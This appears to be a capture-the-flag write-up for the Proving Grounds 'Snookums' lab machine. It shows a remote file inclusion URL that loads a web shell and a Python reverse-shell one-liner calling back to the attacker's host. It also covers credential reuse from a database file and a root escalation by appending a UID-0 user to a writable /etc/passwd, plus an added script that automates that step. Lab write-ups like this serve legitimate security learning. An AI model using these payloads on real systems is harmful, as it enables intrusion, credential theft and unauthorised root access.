Snookums
Writeup for Snookums from offsec Proving Grounds
sudo ./nmapAutomator.sh 192.168.163.58 all
Service Enumeration
db.php and functions.php look interesting, but both return a blank page. Keep in mind that these files exist; they may become useful later.
At the bottom of the page, we see that the site is running Simple PHP Photo Gallery v0.8, which is vulnerable to Remote File Inclusion (RFI) through the img parameter of image.php.
Next, we can get a web shell on the target machine. We host a PHP web shell on our attacking machine over HTTP and then browse to the following URL, so the vulnerable image.php fetches our file and executes it. This only works because PHP's allow_url_include is enabled on the target; with it disabled, image.php could at most include local files.
http://192.168.163.58/image.php?img=http://192.168.49.163/home/kali/Simple-PHP-Web-Shell/index.php
From here, let's upgrade to an interactive reverse shell. We start a listener on our machine on port 21 (for example nc -lvnp 21) and run the following payload through the web shell:
Payload: /usr/bin/python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.163",21));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Running LinPEAS on the target machine, we find something interesting: the db.php file we noted earlier contains hard-coded credentials.
We read db.php to see whether any other credentials are defined in it.
These look like login credentials for MySQL, which is running on port 3306.
Inside the database we find base64-encoded passwords for a few users. Decoding them gives the following.
From the LinPEAS output, we know that Micheal and GitRekt are users with a login shell.
Since passwords are often reused, we try to SSH in as Micheal with the decoded password, and it works.
Let's run LinPEAS again as this user to see if there's anything we can use to get root.
Looks like /etc/passwd is writable by our user, which means we can add our own UID 0 user!
We generate a password hash in crypt(3) format (for example with openssl passwd) and place it directly in the second field of the entry, so no /etc/shadow entry is needed.
From here, we append our new user to /etc/passwd using the following payload:
echo "root2:vFyQtlMtRW/tU:0:0:root:/root:/bin/bash" >> /etc/passwd
Then we switch to the new user with su root2 and the password we chose. And we got root!
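The /etc/passwd trick above is easy to get wrong: a line with the wrong number of fields or a typo in the hash can break logins for everyone on the box. The script below is an added example, not part of the original writeup, that wraps the same steps in checks a practitioner would want: confirm the file is writable, build a well-formed passwd(5) entry with UID and GID 0, refuse to write anything malformed or a duplicate name, and read the result back. The target file is a parameter so the script can be tried against a copy first; the username root2 and the hash come from the writeup, and the assumption is that a crypt(3) hash has already been produced with something like openssl passwd -1.

```shell
#!/bin/sh
# Added example (not from the original writeup): append a UID-0 user to a
# writable passwd file with sanity checks. FILE is a parameter so the script
# can be exercised against a constructed copy; pointing it at /etc/passwd is
# the actual privilege-escalation step described above.

# Return 0 if FILE exists and the current user may write to it.
passwd_writable() {
    [ -f "$1" ] && [ -w "$1" ]
}

# Build a passwd(5) line: name:hash:uid:gid:gecos:home:shell.
# The crypt(3) hash goes in the second field, so no shadow entry is needed.
make_passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash' "$1" "$2"
}

# Sanity-check an entry before writing it: no whitespace, exactly seven
# colon-separated fields, and uid and gid both 0.
validate_passwd_entry() {
    entry="$1"
    case "$entry" in *[[:space:]]*) return 1 ;; esac
    fields=$(printf '%s' "$entry" | awk -F: '{print NF}')
    [ "$fields" -eq 7 ] || return 1
    uid=$(printf '%s' "$entry" | cut -d: -f3)
    gid=$(printf '%s' "$entry" | cut -d: -f4)
    [ "$uid" = 0 ] && [ "$gid" = 0 ]
}

# Append a root-equivalent user to FILE if FILE is writable, the name is not
# already taken, and the entry passes validation. Returns 0 on success.
add_root_user() {
    file="$1"; username="$2"; hash="$3"
    passwd_writable "$file" || { echo "$file is not writable" >&2; return 1; }
    if grep -q "^${username}:" "$file"; then
        echo "user $username already exists in $file" >&2
        return 1
    fi
    entry=$(make_passwd_entry "$username" "$hash")
    validate_passwd_entry "$entry" || { echo "refusing to write malformed entry" >&2; return 1; }
    printf '%s\n' "$entry" >> "$file"
}

# Read back the uid field for USER from FILE, to confirm what was written.
uid_of() {
    awk -F: -v u="$2" '$1 == u {print $3}' "$1"
}

# On the target, after HASH=$(openssl passwd -1 'chosen-password'):
#   add_root_user /etc/passwd root2 "$HASH" && su root2
```

Running it against a scratch copy of /etc/passwd first (cp /etc/passwd /tmp/pw; add_root_user /tmp/pw root2 "$HASH") shows exactly what line will be appended before the real file is touched.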